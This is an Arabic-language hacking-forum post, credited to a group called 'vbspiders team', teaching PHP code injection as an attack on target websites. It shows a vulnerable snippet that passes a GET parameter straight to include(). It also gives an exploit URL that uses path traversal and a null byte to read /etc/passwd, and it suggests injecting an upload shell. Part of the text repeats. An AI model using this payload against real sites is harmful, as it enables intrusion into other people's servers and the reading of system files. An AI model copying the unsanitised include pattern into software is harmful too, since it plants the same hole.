PHP Code Injection Attack بسيط ..
السلام عليكم ورحمة الله تعالى وبركاته
تغرة حقن اكواد php صعب تلقاها، بس المهم رح نحاول نشرحها ..
الفكره انها تمكن المخترق من حقن اكواد php داخل الموقع المستهدف، يعني يمكن ان نقوم بحقن كود مركز تحميل او ما الى ذلك ... المهم
حقن دالة include() :
الاستغلال :
والسلام عليكم.
@vbspiders team
تغرة حقن اكواد php صعب تلقاها، بس المهم رح نحاول نشرحها ..
الفكره انها تمكن المخترق من حقن اكواد php داخل الموقع المستهدف، يعني يمكن ان نقوم بحقن كود مركز تحميل او ما الى ذلك ... المهم
حقن دالة include() :
PHP:
<?php include($_GET["$include"]) ?>الاستغلال :
PHP:
www.site.com/load.php?include=../../../etc/passwd%00والسلام عليكم.
@vbspiders team
التعديل الأخير:
اسم الموضوع : PHP Code Injection Attack بسيط ..
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات